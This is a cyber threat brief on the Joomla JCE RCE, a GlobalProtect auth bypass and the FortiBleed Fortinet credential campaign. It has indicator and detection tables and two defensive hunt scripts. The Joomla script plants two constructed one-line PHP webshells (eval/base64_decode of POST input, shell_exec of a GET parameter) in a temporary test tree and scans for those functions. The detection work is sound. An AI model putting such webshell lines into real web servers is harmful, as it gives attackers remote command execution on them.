Cyber Threat Brief — June 18 2026
1. Joomla JCE Unauthenticated RCE — CVE-2026-48907
TL;DR: CVSS 10.0 unauthenticated RCE in Joomla Content Editor (JCE) via chained profile import flaws. CISA KEV added June 16; active exploitation confirmed. Patch to 2.9.99.5+.
What’s New:
- Chained design failure: missing authorization on profile import + insufficient file validation + disabled upload safety controls = unauthenticated PHP upload and execution
- YesWeHack published full technical writeup and PoC (ywh-jfellus/CVE-2026-48907)
- Affects JCE 1.0.0 through 2.9.99.4; fixed in 2.9.99.5 (June 3)
- CISA KEV added June 16, federal deadline July 7 under BOD 26-04
- Post-exploitation: rogue editor profiles with machine-generated names, large negative ordering values, and PHP in allowed filetypes
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Rogue JCE editor profiles (negative ordering, php in filetypes) | Persistence indicator | T1505.003 | Joomla DB / admin panel | Audit JCE profiles for unknown entries |
| PHP files in tmp/, media/, images/ dirs | Webshell | T1505.003 | File integrity monitoring | Alert on .php creation in media directories |
| Hidden .xml.php files in Joomla dirs | Webshell | T1036.005 | FIM / endpoint | Hunt for double-extension PHP files |
| Unauthenticated POST to JCE profile/upload endpoints | Initial access | T1190 | WAF / access logs | Block unauthenticated profile import requests |
| eval, base64_decode, shell_exec in uploaded files | Payload indicators | T1059.004 | YARA / FIM | Scan webroot for obfuscated PHP |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Web Shell Indicator (generic) | No JCE-specific rule; need profile import endpoint monitoring |
| Elastic | Webshell Detection via File Creation (generic) | No Joomla JCE-specific detection |
| Sigma | webshell_detection_file_creation.yml (generic) | Needs JCE profile import URI pattern |
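A hunt script covering the JCE artifacts in the table above (PHP in media dirs, double-extension files, payload functions, rogue profiles), added here as an example and not code from YesWeHack, Joomla or any cited source. It assumes JCE profile rows arrive as dicts with `name`, `ordering` and `filetypes` keys, and builds its own constructed sample webroot for demonstration:

```python
import re
import tempfile
from pathlib import Path

# Joomla dirs the brief names as webshell drop zones, and the payload functions it lists
SUSPECT_DIRS = ("tmp", "media", "images")
PAYLOAD_RE = re.compile(rb"\b(eval|base64_decode|shell_exec)\s*\(")
DOUBLE_EXT_RE = re.compile(r"\.[a-z0-9]+\.php$", re.IGNORECASE)  # e.g. profile.xml.php

def hunt_webroot(webroot):
    """Walk a Joomla webroot; return (indicator, relative_path) findings."""
    root = Path(webroot)
    findings = []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root)
        is_php = path.suffix.lower() == ".php"
        if is_php and rel.parts[0] in SUSPECT_DIRS:
            findings.append(("php_in_media_dir", rel.as_posix()))
        if DOUBLE_EXT_RE.search(path.name):
            findings.append(("double_extension", rel.as_posix()))
        if is_php:
            hits = sorted({m.group(1).decode() for m in PAYLOAD_RE.finditer(path.read_bytes())})
            if hits:
                findings.append(("payload:" + ",".join(hits), rel.as_posix()))
    return findings

def rogue_profiles(profiles):
    """Flag JCE profile rows (assumed keys: name, ordering, filetypes) with negative ordering or php allowed."""
    flagged = []
    for p in profiles:
        reasons = []
        if int(p.get("ordering", 0)) < 0:
            reasons.append("negative_ordering")
        if "php" in {e.strip().lower() for e in p.get("filetypes", "").split(",")}:
            reasons.append("php_filetype")
        if reasons:
            flagged.append((p["name"], reasons))
    return flagged

def build_sample_webroot():
    """Constructed sample tree: one clean component file plus two planted webshells."""
    root = Path(tempfile.mkdtemp())
    for sub in ("components", "media", "images"):
        (root / sub).mkdir()
    (root / "components" / "index.php").write_text("<?php echo 'ok'; ?>")
    (root / "media" / "cache.php").write_text("<?php eval(base64_decode($_POST['c'])); ?>")
    (root / "images" / "profile.xml.php").write_text("<?php shell_exec($_GET['x']); ?>")
    return str(root)
```

Run `hunt_webroot()` against the real webroot and `rogue_profiles()` against rows pulled from the JCE profiles table to get the same findings on a live install.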
Sources: YesWeHack writeup · CISA KEV · THN · BleepingComputer
2. Palo Alto GlobalProtect Auth Bypass — CVE-2026-0257
TL;DR: CVSS 7.8 authentication bypass lets unauthenticated attackers forge GlobalProtect VPN cookies and establish unauthorized VPN sessions. Actively exploited since May 17. CISA KEV deadline TOMORROW June 19.
What’s New:
- Authentication override cookies encrypted with the portal/gateway HTTPS certificate; attacker extracts public key and forges valid auth cookies
- Unit42 confirmed two exploitation waves: May 17 and May 21, with continued activity through June
- Rapid7, Arctic Wolf both independently confirmed active exploitation and increasing scan volume
- Affects PAN-OS firewalls with GlobalProtect portal/gateway + authentication override cookies enabled + shared certificate configuration
- Panorama and Cloud NGFW not affected
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Anomalous POST to /global-protect/portal/login.esp with long saml-response | Exploitation | T1190 | PAN-OS traffic logs | Alert on oversized saml-response parameters |
| Files matching gb_sess_*.txt in /opt/pancfg/session/ | Post-exploitation | T1078 | PAN-OS filesystem | Hunt for unexpected session files |
| Outbound WebSocket on 443/8443 from firewall | C2 | T1071.001 | PAN-OS traffic logs | Alert on firewall-initiated WebSocket connections |
| New local admin accounts on firewall | Persistence | T1136.001 | PAN-OS config audit | Baseline and alert on admin account creation |
| Sessions with empty domain + Win10 Pro 64-bit client config | Exploitation indicator | T1078 | GlobalProtect logs | Hunt for sessions with this fingerprint |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No GlobalProtect auth bypass detection; need PAN-OS syslog correlation for cookie anomalies |
| Elastic | None | No PAN-OS GlobalProtect-specific detection |
| Sigma | None | No coverage; need rule for GlobalProtect session anomalies via syslog |
Sources: Palo Alto advisory · Unit42 threat brief · Rapid7 · Arctic Wolf
3. FortiBleed — 73K+ Fortinet Firewalls Credential Harvest
TL;DR: Automated credential-harvesting campaign compromised 73,932 Fortinet firewall URLs across 194 countries. Verified working admin credentials dumped publicly June 16-17. Affected orgs include Accenture, Samsung, Siemens, Oracle. Treat as confirmed breach if in dataset.
What’s New:
- Attackers used automated scanning from centralized infrastructure (3xK GmbH, Germany) with curated password lists
- Compromised devices used as listening posts to intercept SSL VPN auth hashes, cracked on 45-GPU Hashtopolis cluster
- Russian-speaking operators; victim list heavily concentrated in NATO countries
- SOCRadar released free FortiBleed Exposure Checker for IP/domain lookup
- Not a single CVE exploit — credential stuffing + hash cracking at scale against weak/reused passwords
- 21,632 unique affected domains confirmed
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Infrastructure: 3xK GmbH (AS212317) source IPs | Scanner infrastructure | T1595.002 | Firewall logs | Block/alert on connections from AS212317 |
| Atypical browser User-Agent strings on VPN portal | Scanning indicator | T1595.002 | FortiGate access logs | Hunt for non-standard UA strings on admin/VPN login |
| Uniform username-password probe patterns | Brute force | T1110.001 | FortiGate auth logs | Alert on credential stuffing patterns |
| Admin account creation post-compromise | Persistence | T1136.001 | FortiGate event logs | Audit and baseline admin accounts |
| SSL VPN session from unexpected geolocations | Unauthorized access | T1078.001 | FortiGate VPN logs | Correlate VPN sessions against expected geo |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No Fortinet credential-stuffing detection; need FortiGate syslog brute-force correlation |
| Elastic | None | No FortiGate-specific brute-force or credential-leak detection |
| Sigma | None | No coverage for FortiGate VPN credential harvesting patterns |
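The FortiGate brute-force correlation listed as a gap above, as an added example and not a Fortinet or vendor rule. The log lines are constructed in a simplified FortiGate-style key=value layout (not real device output), and the 10-minute window and 5-username threshold are assumptions to tune per estate:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a simplified FortiGate-style key=value layout (not real device output):
# one source spraying six usernames in 25 seconds, and one user who mistypes once then logs in.
SAMPLE_LOG = """\
date=2026-06-16 time=03:00:01 user="admin" srcip=203.0.113.10 status="failure" agent="python-requests/2.31"
date=2026-06-16 time=03:00:04 user="vpnuser" srcip=203.0.113.10 status="failure" agent="python-requests/2.31"
date=2026-06-16 time=03:00:09 user="backup" srcip=203.0.113.10 status="failure" agent="python-requests/2.31"
date=2026-06-16 time=03:00:13 user="it" srcip=203.0.113.10 status="failure" agent="python-requests/2.31"
date=2026-06-16 time=03:00:20 user="test" srcip=203.0.113.10 status="failure" agent="python-requests/2.31"
date=2026-06-16 time=03:00:25 user="guest" srcip=203.0.113.10 status="failure" agent="python-requests/2.31"
date=2026-06-16 time=08:12:40 user="jsmith" srcip=198.51.100.7 status="failure" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
date=2026-06-16 time=08:12:55 user="jsmith" srcip=198.51.100.7 status="success" agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_events(text):
    """Parse key=value lines into dicts, adding a datetime under 'ts'; skip lines with no srcip."""
    events = []
    for line in text.splitlines():
        kv = {k: v.strip('"') for k, v in KV_RE.findall(line)}
        if "srcip" not in kv:
            continue
        kv["ts"] = datetime.strptime(kv["date"] + " " + kv["time"], "%Y-%m-%d %H:%M:%S")
        events.append(kv)
    return events

def detect_stuffing(events, window=timedelta(minutes=10), min_users=5):
    """Sliding window per source IP: flag sources whose failed logins span >= min_users distinct
    usernames inside `window`. Returns {srcip: max distinct usernames seen in one window}."""
    by_src = defaultdict(list)
    for e in events:
        if e["status"] == "failure":
            by_src[e["srcip"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        lo = 0
        for hi in range(len(evs)):
            while evs[hi]["ts"] - evs[lo]["ts"] > window:
                lo += 1
            users = {x["user"] for x in evs[lo:hi + 1]}
            if len(users) >= min_users:
                alerts[src] = max(alerts.get(src, 0), len(users))
    return alerts

def atypical_agents(events):
    """Source IPs presenting a non-browser User-Agent on the VPN login (the brief's UA indicator)."""
    return {e["srcip"]: e["agent"] for e in events if not e["agent"].startswith("Mozilla/")}
```

Feed real FortiGate SSL VPN auth events through `parse_events()` after mapping your syslog field names onto `user`, `srcip`, `status` and `agent`.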
Sources: Arctic Wolf · BleepingComputer · SOCRadar · TechCrunch
Status Updates
- CVE-2026-47281 / CVE-2026-50656 (RoguePlanet — Windows Defender): Microsoft officially assigned CVE-2026-50656 (CVSS 7.8) on June 16 and confirmed working on a patch. Still UNPATCHED zero-day. PoC public. Defender definition 1.453.20.0 detects PoC binary but does not fix root cause. Detection: alert on interactive SYSTEM shell with MsMpEng.exe parent. SecurityWeek · BleepingComputer
- CVE-2026-54420 (LiteSpeed cPanel Plugin): CISA KEV federal deadline TODAY June 18. Privilege escalation via symlink abuse on shared hosting. Patch to cPanel plugin v2.4.8. THN
- CVE-2026-28318 (SolarWinds Serv-U): CISA KEV federal deadline TOMORROW June 19. DoS via deflate POST. Patch to 15.5.4 Hotfix 1. Original brief